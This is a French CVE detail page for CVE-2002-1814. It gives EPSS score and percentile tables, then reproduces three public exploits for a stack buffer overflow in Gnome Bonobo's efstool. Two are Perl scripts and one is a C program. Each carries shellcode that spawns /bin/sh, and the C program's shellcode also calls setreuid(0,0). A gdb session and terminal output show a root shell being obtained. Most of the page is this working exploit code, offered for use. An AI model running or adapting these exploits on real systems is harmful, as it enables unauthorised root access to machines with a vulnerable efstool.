CVE-2002-1814 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.9%	–	–
2022-04-03	–	–	1.9%	–	–
2022-04-24	–	–	1.9%	–	–
2022-09-11	–	–	1.9%	–	–
2023-03-12	–	–	–	0.04%	–
2024-02-11	–	–	–	0.15%	–
2024-03-03	–	–	–	0.15%	–
2024-06-02	–	–	–	0.15%	–
2024-09-22	–	–	–	0.04%	–
2024-12-22	–	–	–	0.39%	–
2025-01-19	–	–	–	0.39%	–
2025-03-18	–	–	–	–	0.14%
2025-03-30	–	–	–	–	0.12%
2025-04-06	–	–	–	–	0.12%
2025-04-15	–	–	–	–	0.12%
2025-04-15	–	–	–	–	0.12,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	55%
2022-04-03	75%
2022-04-24	76%
2022-09-11	77%
2023-03-12	–
2024-02-11	5%
2024-03-03	51%
2024-06-02	52%
2024-09-22	–
2024-12-22	73%
2025-01-19	73%
2025-03-18	32%
2025-03-30	28%
2025-04-06	29%
2025-04-15	33%
2025-04-15	33%

source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code. #!/usr/bin/perl # efstool root exploit # written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp) # give the campers internet grogan! # # tested to work on slackware 8, mandrake 8, mandrake 7.1 # tweaks may be needed on the offset # method 1 works more often but # method 2 is faster but not too good # # # enjoy -clorox # perl efs.pl -1000 $shellcode = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89". "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3". "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29". "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff". "/bin/sh"; $shellcode2 = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88". "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3". "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31". "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". "\xff\xff/bin/sh"; $ret = "0xbfffe890"; $offset = $ARGV[0]; $nop = "\x90"; if ($ARGV[1] eq "m1") { $len = 3000; for ($i = 0; $i < ($len - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; } elsif ($ARGV[1] eq "m2") { $len = 10010; for ($i = 0; $i < ($len - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode2; } else { print "You must specify a method fool!\n"; print "perl $0 <offset> m1 or m2\n"; } $buffer .= pack('l', ($ret + $offset)); $buffer .= pack('l', ($ret + $offset)); exec("efstool $buffer"); # and on the seventh day clorox said "LET THERE BE SHELL!"

source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code. #!/usr/bin/perl # efstool root exploit # written by andrea lisci # perl efstool.pl 3000 $shellcode = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89". "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3". "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29". "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff". "/bin/sh"; $ret = "0xbfffe984"; $offset = $ARGV[0]; $nop = "\x90"; $buffer="'"; $len = 2652; for ($i = 0; $i < $len; $i++) { $buffer .= $nop; } $buffer .= pack('l', ($ret + $offset)); for ($i = 0; $i < 10000; $i++) { $buffer .= $nop; } $buffer .= $shellcode; $buffer .="'"; exec("efstool $buffer");

// source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code. /* Author: N4rK07IX narkotix@linuxmail.org || kayaem@itu.edu.tr (i think this is useless pop3 box,never checked, inbox is out of memory) **Vulnerablity: The vulnerablity is OLD and out of date.Mandrake Linux 9.0 "efstool" libefs1-1.0.20-4mdk local stack overflow. [narkotix@labs c-hell]$ efstool `perl -e 'print "A"x2688'` Segmentation fault [narkotix@labs c-hell]$ gdb) r `perl -e 'print "A"x2688'` Starting program: /usr/bin/efstool `perl -e 'print "A"x2688'` no debugging symbols found)...(no debugging symbols found)... no debugging symbols found)...(no debugging symbols found)... no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info r eax 0xa 10ecx 0xa 10 edx 0x4f4c4554 1330398548 ebx 0x41414141 1094795585 esp 0xbfffe780 0xbfffe780 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 [narkotix@labs c-hell]$ ./env <----- This put sh3llc0de with padding 0x90 s to the environment [narkotix@labs c-hell]$ efstool `perl -e 'print "\x1c\xfd\xff\xbf" x 672'` sh-2.05b# id uid=0(root) gid=0(root) groups=501(narkotix) sh-2.05b# Exploited on Mandrake Linux 9.0 in 2003<--- old history :p efstool must be suid to get an uid(0), but i saw on many systemz it is not suided ,on my system it is. May be when i was asleep my mom had gonna suided it :P [narkotix@labs c-hell]$ make efs_n4 cc efs_n4.c -o efs_n4 [narkotix@labs c-hell]$ ./efs_n4 sh-2.05b# id uid=0(root) gid=0(root) groups=501(narkotix) sh-2.05b# Scriptkiddi3Z im sorry , this is not an 0Hday ; Efstool bug is out of fassion.I 've forgetten to release this shit a year ago , but today i found it on my toolz directory.N0w it is fr33... Greetz: EFnet , laplace_ex , math_monkey,deathmann,ISLAM Nation,EnderUNIX team(Turk BSD crew) Shoutz: Hi bigmutant , is da default configregister 0x2102 on your cisco1700 ?? Last Words: laplace_ex, bi tane dersi drop etmem lazim Cuma gunu hydraulics labaratuvarinda bekliyorum Motorola 68000 kitabin da ben de kaldi onu da getiririm ---> Haftaya duello var:P */ #include <stdio.h> #include <string.h> #include <unistd.h> #define BUFFERSIZE 2688 static char hell_code[] = //52 bytes sh3llc0de //* setreuid(0,0); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 /* setgid(0); */ "\x31\xdb" // xor %ebx,%ebx "\x89\xd8" // mov %ebx,%eax "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 main(void) //Th3 l3ss c0d3,th3 b3st performance.. { printf("Mandrake Linux 9.0 efstool local xploit written by N4rK07IX\n"); printf("=> narkotix@linuxmail.org\n"); char *env[2] = {hell_code, NULL}; char buffer[BUFFERSIZE]; int i; int *lamepointer = (int *)(buffer ); int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/bin/efstool"); for (i = 0; i < BUFFERSIZE-1 ; i += 4) *lamepointer++ = ret_addr; execle("/usr/bin/efstool", "efstool", buffer, NULL,env); if(!execle) perror("execle()"); return(0); }